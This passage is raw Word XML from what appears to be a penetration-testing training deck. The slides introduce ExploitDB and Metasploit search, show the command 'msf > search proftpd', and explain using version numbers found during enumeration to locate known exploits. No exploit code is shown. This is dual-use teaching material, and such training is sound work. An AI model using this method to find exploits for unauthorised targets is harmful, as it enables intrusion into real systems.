    </w:p>
    <w:p w14:paraId="1766541A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7671"/>
        </w:tabs>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
        <w:t>537 payloads - 41 encoders - 10 nops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB52C6F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="72"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="66"/>
        </w:rPr>
        <w:t>Free Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pro trial: http : //r-7 . co/trymsp ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007677A5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="271" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>msf &gt; search proftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD895D5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="72"/>
        <w:ind w:left="259" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>[ ! ] Module database cache not built yet, using slow search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9029F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="250" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What if you could search for any general exploit code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E63E77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="182" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>There are a handful of POC (Proof-of-Concept) exploit scripts available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A12BD44" wp14:editId="3BF3C72D">
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18513" name="Picture 185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13" name="Picture 18513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3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F7379F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="327" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="122CCB5D" wp14:editId="5B82633C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>10873740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18511" name="Picture 185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11" name="Picture 18511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38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2336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3425D455" wp14:editId="2A4F8B0F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>10972800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18512" name="Picture 185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12" name="Picture 18512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38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3360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4896918B" wp14:editId="535A6C31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11064240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18510" name="Picture 185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10" name="Picture 18510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8100" cy="38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2"/>
        </w:rPr>
        <w:t>But not all of them are strictly Metasploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D80D1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="183" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>As CTE, we need to be able to find previous exploits or vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E39249" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Wouldn't it be handy to have a database of well-docume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>nted exploits?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6FFBD9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="298" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>Introduction to ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D7B17" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="448" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>https://exploit-dbcom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintains up-to-date and current records of known vulnerabilities and attack scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707F13A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="209" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4EF586D1" wp14:editId="3C41D2CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11315700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5181600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7620" cy="15240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19028" name="Picture 1902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28" name="Picture 19028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7620" cy="152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4"/>
        </w:rPr>
        <w:t>The project is owned and maintained by Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE300A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Their website allows you to search by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945ADC0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Type (Denial of Service, remote or local exploit, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127687C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Platform (Windows, Linux, Mobile, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE00655" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Service Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405FC7F1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>"Tag" (code injection, buffer overflow, cross-site scripting, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358632F5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15468" w:right="-1815"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4440B1E7" wp14:editId="00F5C3F0">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19093" name="Picture 1909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93" name="Picture 19093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363980" cy="1036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5DA2A3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId25"/>
          <w:headerReference w:type="default" r:id="rId26"/>
          <w:footerReference w:type="even" r:id="rId27"/>
          <w:footerReference w:type="default" r:id="rId28"/>
          <w:headerReference w:type="first" r:id="rId29"/>
          <w:footerReference w:type="first" r:id="rId30"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="96" w:right="2175" w:bottom="192" w:left="1224" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B354BEA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-480" w:right="-1368"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F6A7992" wp14:editId="62C6B665">
            <wp:extent cx="11369040" cy="6195060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340716" name="Picture 3407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716" name="Picture 340716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11369040" cy="6195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AE1DDD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="10" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is why enumeration is so important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC5032" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="351" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The software name and versio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>n number acquired during enumeration will help with finding an old vulnerability or exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D6EBF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="285" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>You won't be crafting any zero-days.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C503CB2" wp14:editId="2D356A1B">
            <wp:extent cx="228600" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340719" name="Picture 3407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719" name="Picture 340719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3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6E7466" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="1857" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>But old, unpatched or misconfigured software is certainly prevalent today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02742CD3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15228" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753467F2" wp14:editId="76849C75">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30570" name="Picture 3057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570" name="Picture 30570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363980" cy="1036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E83DDE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Search whatever information you have on a target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A55BB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The version number helps narrow down results and potential exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D79683" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="6" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587323EC" wp14:editId="5435F278">
            <wp:extent cx="11029950" cy="4057650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340721" name="Picture 3407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721" name="Picture 340721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11029950" cy="405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B6068B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some entries might just be explanations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25CC01" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-384" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34A3C85A" wp14:editId="0A49E79C">
            <wp:extent cx="11277600" cy="5476875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340723" name="Picture 34072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723" name="Picture 340723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11277600" cy="5476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0FFD1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="363"/>
        <w:ind w:left="76" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50470704" wp14:editId="4FE4F8E6">
            <wp:extent cx="323850" cy="47625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340726" name="Picture 34072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726" name="Picture 340726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23850" cy="4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70"/>
        </w:rPr>
        <w:t>but most inclu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>de exploit code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DDE3B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="342" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="1E2D5E3B" wp14:editId="4D84CCA2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-215264</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-204754</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5857875" cy="4972050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340728" name="Picture 34072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728" name="Picture 340728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857875" cy="4972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6432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="7AAB3C76" wp14:editId="163B845D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>6757035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2814670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1019175" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43762" name="Picture 4376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762" name="Picture 43762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1019175" cy="2000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7456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0451A341" wp14:editId="4AF0A252">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>8890635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3300445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="485775" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340730" name="Picture 34073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730" name="Picture 340730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85775" cy="9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8480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0C8FF5FD" wp14:editId="09DCA85B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>7242810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3309970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="790575" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43742" name="Picture 4374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742" name="Picture 43742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790575" cy="9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0"/>
        </w:rPr>
        <w:t>You won't always see Python used for exploit scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F36D14" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="419" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="8931"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="71335C6F" wp14:editId="5A6E0310">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11515725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5133975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43972" name="Picture 4397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972" name="Picture 43972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0528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="497856A7" wp14:editId="28A11657">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11353800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340732" name="Picture 34073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732" name="Picture 340732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609600" cy="10477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0"/>
        </w:rPr>
        <w:t>But, because it is so ubiquitous and so powerful, it is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC649D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="848" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="1305" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>This script uses Python 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CDEC2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="57" w:after="2"/>
        <w:ind w:left="-9851" w:right="255" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>Your mileage may vary with these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A9EE8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="45" w:after="289"/>
        <w:ind w:left="-9851" w:right="1965" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>exploit scripts..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EE95E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="330"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>They may not always work!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BB91B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="91"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You may find Metasploit modules as well:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD90153" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="486" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="46E2E0FF" wp14:editId="08DE64DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4777740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-205739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6256020" cy="4892040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340734" name="Picture 34073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734" name="Picture 340734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6256020" cy="48920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2576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="56D03E09" wp14:editId="0DE8D19D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1981200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2240280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="784860" cy="213360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
